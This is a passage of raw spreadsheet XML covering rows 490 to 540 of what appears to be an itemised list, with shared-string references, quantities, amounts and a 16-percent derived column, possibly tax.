    </row>
    <row r="490" spans="2:11">
      <c r="B490" s="9">
        <v>517</v>
      </c>
      <c r="C490" s="238" t="s">
        <v>5910</v>
      </c>
      <c r="D490" s="9"/>
      <c r="E490" s="238" t="s">
        <v>5903</v>
      </c>
      <c r="F490" s="238" t="s">
        <v>5911</v>
      </c>
      <c r="G490" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H490" s="10">
        <v>2</v>
      </c>
      <c r="I490" s="14">
        <v>640</v>
      </c>
      <c r="J490" s="15">
        <v>102.4</v>
      </c>
      <c r="K490" s="16"/>
    </row>
    <row r="491" spans="2:11">
      <c r="B491" s="9">
        <v>518</v>
      </c>
      <c r="C491" s="238" t="s">
        <v>5912</v>
      </c>
      <c r="D491" s="238" t="s">
        <v>5913</v>
      </c>
      <c r="E491" s="238" t="s">
        <v>5914</v>
      </c>
      <c r="F491" s="238" t="s">
        <v>2022</v>
      </c>
      <c r="G491" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H491" s="10">
        <v>4</v>
      </c>
      <c r="I491" s="14">
        <v>1880.34</v>
      </c>
      <c r="J491" s="15">
        <v>300.8576</v>
      </c>
      <c r="K491" s="16"/>
    </row>
    <row r="492" spans="2:11">
      <c r="B492" s="9">
        <v>519</v>
      </c>
      <c r="C492" s="238" t="s">
        <v>5915</v>
      </c>
      <c r="D492" s="238" t="s">
        <v>5916</v>
      </c>
      <c r="E492" s="238" t="s">
        <v>5917</v>
      </c>
      <c r="F492" s="9"/>
      <c r="G492" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H492" s="10">
        <v>5</v>
      </c>
      <c r="I492" s="14">
        <v>1043.33</v>
      </c>
      <c r="J492" s="15">
        <v>166.936</v>
      </c>
      <c r="K492" s="16"/>
    </row>
    <row r="493" spans="2:11">
      <c r="B493" s="9">
        <v>520</v>
      </c>
      <c r="C493" s="238" t="s">
        <v>5918</v>
      </c>
      <c r="D493" s="238" t="s">
        <v>5919</v>
      </c>
      <c r="E493" s="238" t="s">
        <v>5920</v>
      </c>
      <c r="F493" s="238" t="s">
        <v>5921</v>
      </c>
      <c r="G493" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H493" s="10">
        <v>16</v>
      </c>
      <c r="I493" s="14">
        <v>6562.3</v>
      </c>
      <c r="J493" s="15">
        <v>1049.9584</v>
      </c>
      <c r="K493" s="16"/>
    </row>
    <row r="494" spans="2:11">
      <c r="B494" s="9">
        <v>521</v>
      </c>
      <c r="C494" s="238" t="s">
        <v>5922</v>
      </c>
      <c r="D494" s="9"/>
      <c r="E494" s="238" t="s">
        <v>5923</v>
      </c>
      <c r="F494" s="9"/>
      <c r="G494" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H494" s="10">
        <v>8</v>
      </c>
      <c r="I494" s="14">
        <v>6153.85</v>
      </c>
      <c r="J494" s="15">
        <v>984.6144</v>
      </c>
      <c r="K494" s="16"/>
    </row>
    <row r="495" spans="2:11">
      <c r="B495" s="9">
        <v>522</v>
      </c>
      <c r="C495" s="238" t="s">
        <v>5924</v>
      </c>
      <c r="D495" s="9"/>
      <c r="E495" s="238" t="s">
        <v>5925</v>
      </c>
      <c r="F495" s="9"/>
      <c r="G495" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H495" s="10">
        <v>2</v>
      </c>
      <c r="I495" s="14">
        <v>2200</v>
      </c>
      <c r="J495" s="15">
        <v>352</v>
      </c>
      <c r="K495" s="16"/>
    </row>
    <row r="496" spans="2:11">
      <c r="B496" s="9">
        <v>523</v>
      </c>
      <c r="C496" s="238" t="s">
        <v>5926</v>
      </c>
      <c r="D496" s="238" t="s">
        <v>5927</v>
      </c>
      <c r="E496" s="238" t="s">
        <v>5928</v>
      </c>
      <c r="F496" s="9"/>
      <c r="G496" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H496" s="10">
        <v>116</v>
      </c>
      <c r="I496" s="14">
        <v>1425.95</v>
      </c>
      <c r="J496" s="15">
        <v>228.1024</v>
      </c>
      <c r="K496" s="16"/>
    </row>
    <row r="497" spans="2:11">
      <c r="B497" s="9">
        <v>524</v>
      </c>
      <c r="C497" s="238" t="s">
        <v>5929</v>
      </c>
      <c r="D497" s="9"/>
      <c r="E497" s="238" t="s">
        <v>5930</v>
      </c>
      <c r="F497" s="9"/>
      <c r="G497" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H497" s="10">
        <v>1</v>
      </c>
      <c r="I497" s="14">
        <v>581.2</v>
      </c>
      <c r="J497" s="15">
        <v>92.992</v>
      </c>
      <c r="K497" s="16"/>
    </row>
    <row r="498" spans="2:11">
      <c r="B498" s="9">
        <v>525</v>
      </c>
      <c r="C498" s="238" t="s">
        <v>5931</v>
      </c>
      <c r="D498" s="9"/>
      <c r="E498" s="238" t="s">
        <v>5932</v>
      </c>
      <c r="F498" s="9"/>
      <c r="G498" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H498" s="10">
        <v>2</v>
      </c>
      <c r="I498" s="14">
        <v>31880.34</v>
      </c>
      <c r="J498" s="15">
        <v>5100.8544</v>
      </c>
      <c r="K498" s="16"/>
    </row>
    <row r="499" spans="2:11">
      <c r="B499" s="9">
        <v>526</v>
      </c>
      <c r="C499" s="238" t="s">
        <v>5933</v>
      </c>
      <c r="D499" s="238" t="s">
        <v>5934</v>
      </c>
      <c r="E499" s="238" t="s">
        <v>5935</v>
      </c>
      <c r="F499" s="238" t="s">
        <v>5936</v>
      </c>
      <c r="G499" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H499" s="10">
        <v>3</v>
      </c>
      <c r="I499" s="14">
        <v>102.56</v>
      </c>
      <c r="J499" s="15">
        <v>16.4112</v>
      </c>
      <c r="K499" s="16"/>
    </row>
    <row r="500" spans="2:11">
      <c r="B500" s="9">
        <v>527</v>
      </c>
      <c r="C500" s="238" t="s">
        <v>5937</v>
      </c>
      <c r="D500" s="238" t="s">
        <v>5938</v>
      </c>
      <c r="E500" s="238" t="s">
        <v>5939</v>
      </c>
      <c r="F500" s="9"/>
      <c r="G500" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H500" s="10">
        <v>1</v>
      </c>
      <c r="I500" s="14">
        <v>60</v>
      </c>
      <c r="J500" s="15">
        <v>9.6</v>
      </c>
      <c r="K500" s="16"/>
    </row>
    <row r="501" spans="2:11">
      <c r="B501" s="9">
        <v>528</v>
      </c>
      <c r="C501" s="238" t="s">
        <v>5940</v>
      </c>
      <c r="D501" s="9"/>
      <c r="E501" s="238" t="s">
        <v>5941</v>
      </c>
      <c r="F501" s="238" t="s">
        <v>5942</v>
      </c>
      <c r="G501" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H501" s="10">
        <v>1</v>
      </c>
      <c r="I501" s="14">
        <v>170.94</v>
      </c>
      <c r="J501" s="15">
        <v>27.3504</v>
      </c>
      <c r="K501" s="16"/>
    </row>
    <row r="502" spans="2:11">
      <c r="B502" s="9">
        <v>529</v>
      </c>
      <c r="C502" s="238" t="s">
        <v>5943</v>
      </c>
      <c r="D502" s="9"/>
      <c r="E502" s="238" t="s">
        <v>5944</v>
      </c>
      <c r="F502" s="238" t="s">
        <v>5945</v>
      </c>
      <c r="G502" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H502" s="10">
        <v>1</v>
      </c>
      <c r="I502" s="14">
        <v>307.69</v>
      </c>
      <c r="J502" s="15">
        <v>49.2304</v>
      </c>
      <c r="K502" s="16"/>
    </row>
    <row r="503" spans="2:11">
      <c r="B503" s="9">
        <v>530</v>
      </c>
      <c r="C503" s="238" t="s">
        <v>5946</v>
      </c>
      <c r="D503" s="9"/>
      <c r="E503" s="238" t="s">
        <v>5947</v>
      </c>
      <c r="F503" s="238" t="s">
        <v>5948</v>
      </c>
      <c r="G503" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H503" s="10">
        <v>2</v>
      </c>
      <c r="I503" s="14">
        <v>1025.64</v>
      </c>
      <c r="J503" s="15">
        <v>164.1024</v>
      </c>
      <c r="K503" s="16"/>
    </row>
    <row r="504" spans="2:11">
      <c r="B504" s="9">
        <v>531</v>
      </c>
      <c r="C504" s="238" t="s">
        <v>5949</v>
      </c>
      <c r="D504" s="9"/>
      <c r="E504" s="238" t="s">
        <v>5950</v>
      </c>
      <c r="F504" s="238" t="s">
        <v>5951</v>
      </c>
      <c r="G504" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H504" s="10">
        <v>1</v>
      </c>
      <c r="I504" s="14">
        <v>2564.11</v>
      </c>
      <c r="J504" s="15">
        <v>410.2576</v>
      </c>
      <c r="K504" s="16"/>
    </row>
    <row r="505" spans="2:11">
      <c r="B505" s="9">
        <v>532</v>
      </c>
      <c r="C505" s="238" t="s">
        <v>5952</v>
      </c>
      <c r="D505" s="9"/>
      <c r="E505" s="238" t="s">
        <v>5953</v>
      </c>
      <c r="F505" s="9"/>
      <c r="G505" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H505" s="10">
        <v>2</v>
      </c>
      <c r="I505" s="14">
        <v>1196.58</v>
      </c>
      <c r="J505" s="15">
        <v>191.4528</v>
      </c>
      <c r="K505" s="16"/>
    </row>
    <row r="506" spans="2:11">
      <c r="B506" s="9">
        <v>533</v>
      </c>
      <c r="C506" s="238" t="s">
        <v>5954</v>
      </c>
      <c r="D506" s="238" t="s">
        <v>5955</v>
      </c>
      <c r="E506" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F506" s="238" t="s">
        <v>5956</v>
      </c>
      <c r="G506" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H506" s="10">
        <v>1</v>
      </c>
      <c r="I506" s="14">
        <v>4529.91</v>
      </c>
      <c r="J506" s="15">
        <v>724.7856</v>
      </c>
      <c r="K506" s="16"/>
    </row>
    <row r="507" spans="2:11">
      <c r="B507" s="9">
        <v>534</v>
      </c>
      <c r="C507" s="238" t="s">
        <v>5957</v>
      </c>
      <c r="D507" s="238" t="s">
        <v>5955</v>
      </c>
      <c r="E507" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F507" s="238" t="s">
        <v>5958</v>
      </c>
      <c r="G507" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H507" s="10">
        <v>1</v>
      </c>
      <c r="I507" s="14">
        <v>4529.91</v>
      </c>
      <c r="J507" s="15">
        <v>724.7856</v>
      </c>
      <c r="K507" s="16"/>
    </row>
    <row r="508" spans="2:11">
      <c r="B508" s="9">
        <v>535</v>
      </c>
      <c r="C508" s="238" t="s">
        <v>5959</v>
      </c>
      <c r="D508" s="238" t="s">
        <v>5955</v>
      </c>
      <c r="E508" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F508" s="238" t="s">
        <v>5960</v>
      </c>
      <c r="G508" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H508" s="10">
        <v>1</v>
      </c>
      <c r="I508" s="14">
        <v>5085.47</v>
      </c>
      <c r="J508" s="15">
        <v>813.6752</v>
      </c>
      <c r="K508" s="16"/>
    </row>
    <row r="509" spans="2:11">
      <c r="B509" s="9">
        <v>536</v>
      </c>
      <c r="C509" s="238" t="s">
        <v>5961</v>
      </c>
      <c r="D509" s="238" t="s">
        <v>5962</v>
      </c>
      <c r="E509" s="238" t="s">
        <v>5963</v>
      </c>
      <c r="F509" s="238" t="s">
        <v>5964</v>
      </c>
      <c r="G509" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H509" s="10">
        <v>11</v>
      </c>
      <c r="I509" s="14">
        <v>59.41</v>
      </c>
      <c r="J509" s="15">
        <v>9.504</v>
      </c>
      <c r="K509" s="16"/>
    </row>
    <row r="510" spans="2:11">
      <c r="B510" s="9">
        <v>537</v>
      </c>
      <c r="C510" s="238" t="s">
        <v>5965</v>
      </c>
      <c r="D510" s="238" t="s">
        <v>5966</v>
      </c>
      <c r="E510" s="238" t="s">
        <v>5967</v>
      </c>
      <c r="F510" s="9"/>
      <c r="G510" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H510" s="10">
        <v>23</v>
      </c>
      <c r="I510" s="14">
        <v>8037.47</v>
      </c>
      <c r="J510" s="15">
        <v>1286.0128</v>
      </c>
      <c r="K510" s="16"/>
    </row>
    <row r="511" spans="2:11">
      <c r="B511" s="9">
        <v>538</v>
      </c>
      <c r="C511" s="238" t="s">
        <v>5968</v>
      </c>
      <c r="D511" s="238" t="s">
        <v>5969</v>
      </c>
      <c r="E511" s="238" t="s">
        <v>5970</v>
      </c>
      <c r="F511" s="238" t="s">
        <v>5971</v>
      </c>
      <c r="G511" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H511" s="10">
        <v>19</v>
      </c>
      <c r="I511" s="14">
        <v>223.45</v>
      </c>
      <c r="J511" s="15">
        <v>35.7504</v>
      </c>
      <c r="K511" s="16"/>
    </row>
    <row r="512" spans="2:11">
      <c r="B512" s="9">
        <v>539</v>
      </c>
      <c r="C512" s="238" t="s">
        <v>5972</v>
      </c>
      <c r="D512" s="238" t="s">
        <v>5973</v>
      </c>
      <c r="E512" s="238" t="s">
        <v>2063</v>
      </c>
      <c r="F512" s="238" t="s">
        <v>5974</v>
      </c>
      <c r="G512" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H512" s="10">
        <v>1</v>
      </c>
      <c r="I512" s="14">
        <v>1538.46</v>
      </c>
      <c r="J512" s="15">
        <v>246.1536</v>
      </c>
      <c r="K512" s="16"/>
    </row>
    <row r="513" spans="2:11">
      <c r="B513" s="9">
        <v>540</v>
      </c>
      <c r="C513" s="238" t="s">
        <v>5975</v>
      </c>
      <c r="D513" s="238" t="s">
        <v>5976</v>
      </c>
      <c r="E513" s="238" t="s">
        <v>5977</v>
      </c>
      <c r="F513" s="9"/>
      <c r="G513" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H513" s="10">
        <v>15</v>
      </c>
      <c r="I513" s="14">
        <v>448.73</v>
      </c>
      <c r="J513" s="15">
        <v>71.808</v>
      </c>
      <c r="K513" s="16"/>
    </row>
    <row r="514" spans="2:11">
      <c r="B514" s="9">
        <v>541</v>
      </c>
      <c r="C514" s="238" t="s">
        <v>5978</v>
      </c>
      <c r="D514" s="238" t="s">
        <v>5979</v>
      </c>
      <c r="E514" s="238" t="s">
        <v>5980</v>
      </c>
      <c r="F514" s="238" t="s">
        <v>5981</v>
      </c>
      <c r="G514" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H514" s="10">
        <v>4</v>
      </c>
      <c r="I514" s="14">
        <v>34.17</v>
      </c>
      <c r="J514" s="15">
        <v>5.4656</v>
      </c>
      <c r="K514" s="16"/>
    </row>
    <row r="515" spans="2:11">
      <c r="B515" s="9">
        <v>542</v>
      </c>
      <c r="C515" s="238" t="s">
        <v>5982</v>
      </c>
      <c r="D515" s="238" t="s">
        <v>5983</v>
      </c>
      <c r="E515" s="238" t="s">
        <v>5984</v>
      </c>
      <c r="F515" s="238" t="s">
        <v>5985</v>
      </c>
      <c r="G515" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H515" s="10">
        <v>4</v>
      </c>
      <c r="I515" s="14">
        <v>5811.96</v>
      </c>
      <c r="J515" s="15">
        <v>929.9136</v>
      </c>
      <c r="K515" s="16"/>
    </row>
    <row r="516" spans="2:11">
      <c r="B516" s="9">
        <v>543</v>
      </c>
      <c r="C516" s="238" t="s">
        <v>5986</v>
      </c>
      <c r="D516" s="9"/>
      <c r="E516" s="238" t="s">
        <v>5987</v>
      </c>
      <c r="F516" s="9"/>
      <c r="G516" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H516" s="10">
        <v>90</v>
      </c>
      <c r="I516" s="14">
        <v>1000.03</v>
      </c>
      <c r="J516" s="15">
        <v>159.984</v>
      </c>
      <c r="K516" s="16"/>
    </row>
    <row r="517" spans="2:11">
      <c r="B517" s="9">
        <v>544</v>
      </c>
      <c r="C517" s="238" t="s">
        <v>5988</v>
      </c>
      <c r="D517" s="238" t="s">
        <v>5989</v>
      </c>
      <c r="E517" s="238" t="s">
        <v>5987</v>
      </c>
      <c r="F517" s="238" t="s">
        <v>5990</v>
      </c>
      <c r="G517" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H517" s="10">
        <v>18</v>
      </c>
      <c r="I517" s="14">
        <v>169.3</v>
      </c>
      <c r="J517" s="15">
        <v>27.1008</v>
      </c>
      <c r="K517" s="16"/>
    </row>
    <row r="518" spans="2:11">
      <c r="B518" s="9">
        <v>545</v>
      </c>
      <c r="C518" s="238" t="s">
        <v>5991</v>
      </c>
      <c r="D518" s="238" t="s">
        <v>5992</v>
      </c>
      <c r="E518" s="238" t="s">
        <v>5987</v>
      </c>
      <c r="F518" s="238" t="s">
        <v>5993</v>
      </c>
      <c r="G518" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H518" s="10">
        <v>231</v>
      </c>
      <c r="I518" s="14">
        <v>876.52</v>
      </c>
      <c r="J518" s="15">
        <v>140.0784</v>
      </c>
      <c r="K518" s="16"/>
    </row>
    <row r="519" spans="2:11">
      <c r="B519" s="9">
        <v>546</v>
      </c>
      <c r="C519" s="238" t="s">
        <v>5994</v>
      </c>
      <c r="D519" s="238" t="s">
        <v>5995</v>
      </c>
      <c r="E519" s="238" t="s">
        <v>5996</v>
      </c>
      <c r="F519" s="9"/>
      <c r="G519" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H519" s="10">
        <v>22</v>
      </c>
      <c r="I519" s="14">
        <v>141.92</v>
      </c>
      <c r="J519" s="15">
        <v>22.704</v>
      </c>
      <c r="K519" s="16"/>
    </row>
    <row r="520" spans="2:11">
      <c r="B520" s="9">
        <v>547</v>
      </c>
      <c r="C520" s="238" t="s">
        <v>5997</v>
      </c>
      <c r="D520" s="238" t="s">
        <v>5998</v>
      </c>
      <c r="E520" s="238" t="s">
        <v>5999</v>
      </c>
      <c r="F520" s="238" t="s">
        <v>6000</v>
      </c>
      <c r="G520" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H520" s="10">
        <v>17</v>
      </c>
      <c r="I520" s="14">
        <v>189.11</v>
      </c>
      <c r="J520" s="15">
        <v>30.2464</v>
      </c>
      <c r="K520" s="16"/>
    </row>
    <row r="521" spans="2:11">
      <c r="B521" s="9">
        <v>548</v>
      </c>
      <c r="C521" s="238" t="s">
        <v>6001</v>
      </c>
      <c r="D521" s="238" t="s">
        <v>5825</v>
      </c>
      <c r="E521" s="238" t="s">
        <v>6002</v>
      </c>
      <c r="F521" s="238" t="s">
        <v>6003</v>
      </c>
      <c r="G521" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H521" s="10">
        <v>3</v>
      </c>
      <c r="I521" s="14">
        <v>1346.15</v>
      </c>
      <c r="J521" s="15">
        <v>215.3856</v>
      </c>
      <c r="K521" s="16"/>
    </row>
    <row r="522" spans="2:11">
      <c r="B522" s="9">
        <v>549</v>
      </c>
      <c r="C522" s="238" t="s">
        <v>6004</v>
      </c>
      <c r="D522" s="238" t="s">
        <v>6005</v>
      </c>
      <c r="E522" s="238" t="s">
        <v>6006</v>
      </c>
      <c r="F522" s="238" t="s">
        <v>6007</v>
      </c>
      <c r="G522" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H522" s="10">
        <v>8</v>
      </c>
      <c r="I522" s="14">
        <v>1019.07</v>
      </c>
      <c r="J522" s="15">
        <v>163.0464</v>
      </c>
      <c r="K522" s="16"/>
    </row>
    <row r="523" spans="2:11">
      <c r="B523" s="9">
        <v>550</v>
      </c>
      <c r="C523" s="238" t="s">
        <v>6008</v>
      </c>
      <c r="D523" s="9"/>
      <c r="E523" s="238" t="s">
        <v>6009</v>
      </c>
      <c r="F523" s="238" t="s">
        <v>6010</v>
      </c>
      <c r="G523" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H523" s="10">
        <v>2</v>
      </c>
      <c r="I523" s="14">
        <v>3282.06</v>
      </c>
      <c r="J523" s="15">
        <v>525.1296</v>
      </c>
      <c r="K523" s="16"/>
    </row>
    <row r="524" spans="2:11">
      <c r="B524" s="9">
        <v>551</v>
      </c>
      <c r="C524" s="238" t="s">
        <v>6011</v>
      </c>
      <c r="D524" s="238" t="s">
        <v>6012</v>
      </c>
      <c r="E524" s="238" t="s">
        <v>6013</v>
      </c>
      <c r="F524" s="238" t="s">
        <v>6014</v>
      </c>
      <c r="G524" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H524" s="10">
        <v>1</v>
      </c>
      <c r="I524" s="14">
        <v>1564.1</v>
      </c>
      <c r="J524" s="15">
        <v>250.256</v>
      </c>
      <c r="K524" s="16"/>
    </row>
    <row r="525" spans="2:11">
      <c r="B525" s="9">
        <v>552</v>
      </c>
      <c r="C525" s="238" t="s">
        <v>6015</v>
      </c>
      <c r="D525" s="9"/>
      <c r="E525" s="238" t="s">
        <v>6016</v>
      </c>
      <c r="F525" s="238" t="s">
        <v>5948</v>
      </c>
      <c r="G525" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H525" s="10">
        <v>1</v>
      </c>
      <c r="I525" s="14">
        <v>1538.46</v>
      </c>
      <c r="J525" s="15">
        <v>246.1536</v>
      </c>
      <c r="K525" s="16"/>
    </row>
    <row r="526" spans="2:11">
      <c r="B526" s="9">
        <v>553</v>
      </c>
      <c r="C526" s="238" t="s">
        <v>6017</v>
      </c>
      <c r="D526" s="238" t="s">
        <v>6018</v>
      </c>
      <c r="E526" s="238" t="s">
        <v>6019</v>
      </c>
      <c r="F526" s="238" t="s">
        <v>6020</v>
      </c>
      <c r="G526" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H526" s="10">
        <v>3</v>
      </c>
      <c r="I526" s="14">
        <v>1410.26</v>
      </c>
      <c r="J526" s="15">
        <v>225.6432</v>
      </c>
      <c r="K526" s="16"/>
    </row>
    <row r="527" spans="2:11">
      <c r="B527" s="9">
        <v>554</v>
      </c>
      <c r="C527" s="238" t="s">
        <v>6021</v>
      </c>
      <c r="D527" s="238" t="s">
        <v>6022</v>
      </c>
      <c r="E527" s="238" t="s">
        <v>5886</v>
      </c>
      <c r="F527" s="238" t="s">
        <v>6023</v>
      </c>
      <c r="G527" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H527" s="10">
        <v>4</v>
      </c>
      <c r="I527" s="14">
        <v>91.3</v>
      </c>
      <c r="J527" s="15">
        <v>14.6112</v>
      </c>
      <c r="K527" s="16"/>
    </row>
    <row r="528" spans="2:11">
      <c r="B528" s="9">
        <v>555</v>
      </c>
      <c r="C528" s="238" t="s">
        <v>6024</v>
      </c>
      <c r="D528" s="238" t="s">
        <v>5452</v>
      </c>
      <c r="E528" s="238" t="s">
        <v>6025</v>
      </c>
      <c r="F528" s="238" t="s">
        <v>6026</v>
      </c>
      <c r="G528" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H528" s="10">
        <v>6</v>
      </c>
      <c r="I528" s="14">
        <v>25.64</v>
      </c>
      <c r="J528" s="15">
        <v>4.0992</v>
      </c>
      <c r="K528" s="16"/>
    </row>
    <row r="529" spans="2:11">
      <c r="B529" s="9">
        <v>556</v>
      </c>
      <c r="C529" s="238" t="s">
        <v>6027</v>
      </c>
      <c r="D529" s="9"/>
      <c r="E529" s="238" t="s">
        <v>6028</v>
      </c>
      <c r="F529" s="9"/>
      <c r="G529" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H529" s="10">
        <v>3</v>
      </c>
      <c r="I529" s="14">
        <v>1058.23</v>
      </c>
      <c r="J529" s="15">
        <v>169.3152</v>
      </c>
      <c r="K529" s="16"/>
    </row>
    <row r="530" spans="2:11">
      <c r="B530" s="9">
        <v>557</v>
      </c>
      <c r="C530" s="238" t="s">
        <v>6029</v>
      </c>
      <c r="D530" s="238" t="s">
        <v>6030</v>
      </c>
      <c r="E530" s="238" t="s">
        <v>6031</v>
      </c>
      <c r="F530" s="238" t="s">
        <v>6032</v>
      </c>
      <c r="G530" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H530" s="10">
        <v>5</v>
      </c>
      <c r="I530" s="14">
        <v>735.04</v>
      </c>
      <c r="J530" s="15">
        <v>117.608</v>
      </c>
      <c r="K530" s="16"/>
    </row>
    <row r="531" spans="2:11">
      <c r="B531" s="9">
        <v>558</v>
      </c>
      <c r="C531" s="238" t="s">
        <v>6033</v>
      </c>
      <c r="D531" s="238" t="s">
        <v>6034</v>
      </c>
      <c r="E531" s="238" t="s">
        <v>6035</v>
      </c>
      <c r="F531" s="238" t="s">
        <v>6036</v>
      </c>
      <c r="G531" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H531" s="10">
        <v>3</v>
      </c>
      <c r="I531" s="14">
        <v>3518.53</v>
      </c>
      <c r="J531" s="15">
        <v>562.9632</v>
      </c>
      <c r="K531" s="16"/>
    </row>
    <row r="532" spans="2:11">
      <c r="B532" s="9">
        <v>559</v>
      </c>
      <c r="C532" s="238" t="s">
        <v>6037</v>
      </c>
      <c r="D532" s="238" t="s">
        <v>6038</v>
      </c>
      <c r="E532" s="238" t="s">
        <v>6039</v>
      </c>
      <c r="F532" s="238" t="s">
        <v>6040</v>
      </c>
      <c r="G532" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H532" s="10">
        <v>1</v>
      </c>
      <c r="I532" s="14">
        <v>726.5</v>
      </c>
      <c r="J532" s="15">
        <v>116.24</v>
      </c>
      <c r="K532" s="16"/>
    </row>
    <row r="533" spans="2:11">
      <c r="B533" s="9">
        <v>560</v>
      </c>
      <c r="C533" s="238" t="s">
        <v>6041</v>
      </c>
      <c r="D533" s="238" t="s">
        <v>6042</v>
      </c>
      <c r="E533" s="238" t="s">
        <v>6043</v>
      </c>
      <c r="F533" s="238" t="s">
        <v>6044</v>
      </c>
      <c r="G533" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H533" s="10">
        <v>18</v>
      </c>
      <c r="I533" s="14">
        <v>5923.07</v>
      </c>
      <c r="J533" s="15">
        <v>947.6928</v>
      </c>
      <c r="K533" s="16"/>
    </row>
    <row r="534" spans="2:11">
      <c r="B534" s="9">
        <v>561</v>
      </c>
      <c r="C534" s="238" t="s">
        <v>6045</v>
      </c>
      <c r="D534" s="9"/>
      <c r="E534" s="238" t="s">
        <v>5886</v>
      </c>
      <c r="F534" s="9"/>
      <c r="G534" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H534" s="10">
        <v>14</v>
      </c>
      <c r="I534" s="14">
        <v>114.66</v>
      </c>
      <c r="J534" s="15">
        <v>18.3456</v>
      </c>
      <c r="K534" s="16"/>
    </row>
    <row r="535" spans="2:11">
      <c r="B535" s="9">
        <v>562</v>
      </c>
      <c r="C535" s="238" t="s">
        <v>6046</v>
      </c>
      <c r="D535" s="9"/>
      <c r="E535" s="238" t="s">
        <v>6047</v>
      </c>
      <c r="F535" s="9"/>
      <c r="G535" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H535" s="10">
        <v>10</v>
      </c>
      <c r="I535" s="14">
        <v>55.56</v>
      </c>
      <c r="J535" s="15">
        <v>8.896</v>
      </c>
      <c r="K535" s="16"/>
    </row>
    <row r="536" spans="2:11">
      <c r="B536" s="9">
        <v>563</v>
      </c>
      <c r="C536" s="238" t="s">
        <v>6048</v>
      </c>
      <c r="D536" s="238" t="s">
        <v>6049</v>
      </c>
      <c r="E536" s="238" t="s">
        <v>5596</v>
      </c>
      <c r="F536" s="238" t="s">
        <v>6050</v>
      </c>
      <c r="G536" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H536" s="10">
        <v>13</v>
      </c>
      <c r="I536" s="14">
        <v>800.61</v>
      </c>
      <c r="J536" s="15">
        <v>128.1072</v>
      </c>
      <c r="K536" s="16"/>
    </row>
    <row r="537" spans="2:11">
      <c r="B537" s="9">
        <v>564</v>
      </c>
      <c r="C537" s="238" t="s">
        <v>6051</v>
      </c>
      <c r="D537" s="9"/>
      <c r="E537" s="238" t="s">
        <v>5941</v>
      </c>
      <c r="F537" s="9"/>
      <c r="G537" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H537" s="10">
        <v>3</v>
      </c>
      <c r="I537" s="14">
        <v>3504.27</v>
      </c>
      <c r="J537" s="15">
        <v>560.6832</v>
      </c>
      <c r="K537" s="16"/>
    </row>
    <row r="538" spans="2:11">
      <c r="B538" s="9">
        <v>565</v>
      </c>
      <c r="C538" s="238" t="s">
        <v>6052</v>
      </c>
      <c r="D538" s="238" t="s">
        <v>6053</v>
      </c>
      <c r="E538" s="238" t="s">
        <v>6054</v>
      </c>
      <c r="F538" s="9"/>
      <c r="G538" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H538" s="10">
        <v>40</v>
      </c>
      <c r="I538" s="14">
        <v>9165.33</v>
      </c>
      <c r="J538" s="15">
        <v>1466.432</v>
      </c>
      <c r="K538" s="16"/>
    </row>
    <row r="539" spans="2:11">
      <c r="B539" s="9">
        <v>566</v>
      </c>
      <c r="C539" s="238" t="s">
        <v>6055</v>
      </c>
      <c r="D539" s="238" t="s">
        <v>6056</v>
      </c>
      <c r="E539" s="238" t="s">
        <v>6057</v>
      </c>
      <c r="F539" s="238" t="s">
        <v>6058</v>
      </c>
      <c r="G539" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H539" s="10">
        <v>1</v>
      </c>
      <c r="I539" s="14">
        <v>1920.4</v>
      </c>
      <c r="J539" s="15">
        <v>307.264</v>
      </c>
      <c r="K539" s="16"/>
    </row>
    <row r="540" spans="2:11">
      <c r="B540" s="9">
        <v>567</v>
      </c>
      <c r="C540" s="238" t="s">
        <v>6059</v>
      </c>
      <c r="D540" s="9"/>
      <c r="E540" s="238" t="s">
        <v>2192</v>
      </c>
      <c r="F540" s="238" t="s">
        <v>6060</v>
      </c>
      <c r="G540" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H540" s="10">
